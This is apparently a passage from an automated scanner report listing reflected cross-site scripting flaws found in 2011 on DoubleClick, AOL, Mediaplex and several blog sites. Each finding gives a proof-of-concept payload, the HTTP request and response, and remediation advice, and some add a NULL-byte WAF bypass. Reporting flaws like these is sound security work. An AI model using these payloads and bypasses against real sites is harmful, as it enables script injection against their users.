The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007a266"-alert(1)-"5b4df72a6fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a266"-alert(1)-"5b4df72a6fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5669 Date: Wed, 03 Aug 2011 13:13:10 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /click%3Bh%3Dv8/3b58/f/6f/%2a/n%3B244100576%3B0-0%3B0%3B67833030%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430384/115855006/direct/01%3fhref=&%007a266"-alert(1)-"5b4df72a6fb=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
...[SNIP]...
2.43. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.19
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 676eb'-alert(1)-'004be3e51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.44. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.19
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a94c2"-alert(1)-"0cfdce15f52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb861'-alert(1)-'8ddfc3d33b8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95664"-alert(1)-"db0e79d9468 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.47. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.24
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd92d'-alert(1)-'0d4ae12be94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.48. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.24
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a014"-alert(1)-"2fe659fab9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7729"-alert(1)-"2987a5da095 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.50. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.50
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82770"-alert(1)-"08e18e3c776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6849 Date: Wed, 03 Aug 2011 12:38:25 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... net/click%3Bh%3Dv8/3b58/f/6c/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&82770"-alert(1)-"08e18e3c776=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D318%26migSource%3Dadsrv2%26migTrackDataExt%3D2986074%3B64699383%3B241902957%3B42386233%26migRandom%3D8182521%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B ...[SNIP]...
2.51. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.50
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001abfd'-alert(1)-'25a80048a19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1abfd'-alert(1)-'25a80048a19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e90f"-alert(1)-"03a907c1eb9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6681 Date: Wed, 03 Aug 2011 12:38:09 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=1e90f"-alert(1)-"03a907c1eb9http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64699383;241902957;42386233&migRandom=8166489&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.com ...[SNIP]...
2.53. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.57
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22967'-alert(1)-'2808f7e3313 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.54. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4892.160904.MMNUK/B5353379.57
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5546"-alert(1)-"e555e509462 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2d4"-alert(1)-"778cdb0a564 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21936'-alert(1)-'24eb2c9dc0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97050<script>alert(1)</script>4fedb100f0e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserver/vdi/71138497050<script>alert(1)</script>4fedb100f0e?d=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0&cb=0.13243940961547196 HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/linkedin.dart/fjs_results;optout=false;lang=en;tile=2;sz=728x90;;extra%3Dnull;s=0;ord=691408033? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Accept-Ranges: none Date: Tue, 02 Aug 2011 20:21:09 GMT Server: XPEHb/1.0 Content-Length: 78
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f97f"-alert(1)-"44214e1d902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy5f97f"-alert(1)-"44214e1d902/advertisingcom/opt-out HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 07 Aug 2011 01:26:13 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2 Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=3880879a759c2d9745d71e05c9372db7; expires=Tue, 30 Aug 2011 04:59:33 GMT; path=/; domain=.advertising.aol.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 07 Aug 2011 01:26:13 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4826"-alert(1)-"40d26245d6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcome4826"-alert(1)-"40d26245d6c/opt-out HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 07 Aug 2011 01:26:54 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2 Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=b5291c6f55dad402347af10e85d6ee7f; expires=Tue, 30 Aug 2011 05:00:14 GMT; path=/; domain=.advertising.aol.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 07 Aug 2011 01:26:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Keep-Alive: timeout=15, max=92 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1485e"-alert(1)-"a67cc2ba52e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcom/opt-out1485e"-alert(1)-"a67cc2ba52e HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 07 Aug 2011 01:27:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2 Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=e1d91ef2dae8a39fd0878dd64795bd2f; expires=Tue, 30 Aug 2011 05:00:47 GMT; path=/; domain=.advertising.aol.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 07 Aug 2011 01:27:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 25793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters="javascript:,advertising.a ...[SNIP]...
2.61. http://advertising.aol.com/privacy/advertisingcom/opt-out [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertising.aol.com
Path:
/privacy/advertisingcom/opt-out
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a87d"-alert(1)-"2468124b9ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/advertisingcom/opt-out?9a87d"-alert(1)-"2468124b9ba=1 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mpt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc0c"><script>alert(1)</script>2db2f9db80f was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777c2"><script>alert(1)</script>7fa5842055d was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.64. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/fm/12741-112746-27909-3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc30"><script>alert(1)</script>8af36c94535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload fe2e6<img%20src%3da%20onerror%3dalert(1)>7810eff62ec was submitted in the q parameter. This input was echoed as fe2e6<img src=a onerror=alert(1)>7810eff62ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 4aae1<script>alert(1)</script>e6c7a8db634 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 42c60<script>alert(1)</script>b11310a8a62 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b905<script>alert(1)</script>5e1517256ea was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9bd46<script>alert(1)</script>7f62247a19d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload df6ee<script>alert(1)</script>0abe55f4b8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 321b4<script>alert(1)</script>a6b4e81a8c6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c2d6"><script>alert(1)</script>a087e3155d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:55 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 288 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0b"><script>alert(1)</script>f0fbee0a376 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:58 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 288 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54be9"><script>alert(1)</script>d009f030070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:00 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 287 Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc04"><script>alert(1)</script>4748c177c84 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:03 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 279 Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c027"><script>alert(1)</script>7fbe6b87d67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:00 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972f8"><script>alert(1)</script>32dfd893ce6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:03 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef3"><script>alert(1)</script>1d437585e4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:06 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8090d"><script>alert(1)</script>483e44ae1ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:09 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298bd"><script>alert(1)</script>1e0c6d978bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:03:11 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 318 Content-Type: text/html
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7798<a>d4c0d4c265d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e ...[SNIP]... <em>blog.bolsademulher.com/favicon.icoc7798<a>d4c0d4c265d/</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ac0f<a>981d036f50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e ...[SNIP]... <em>blog.bolsademulher.com/movimentorosa8ac0f<a>981d036f50/</em> ...[SNIP]...
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a22da<script>alert(1)</script>cb5282e3245 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ request parameter is copied into the HTML document as plain text between tags. The payload 85aa3<script>alert(1)</script>530916da0b8 was submitted in the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.85. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://camarimmsn.com.br
Path:
/wp-content/themes/msn-theme/sendMail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f863b<script>alert(1)</script>050e92f0818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into the XML document as plain text between tags. The payload a0ee5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29bac9477af was submitted in the cb parameter. This input was echoed as a0ee5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29bac9477af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
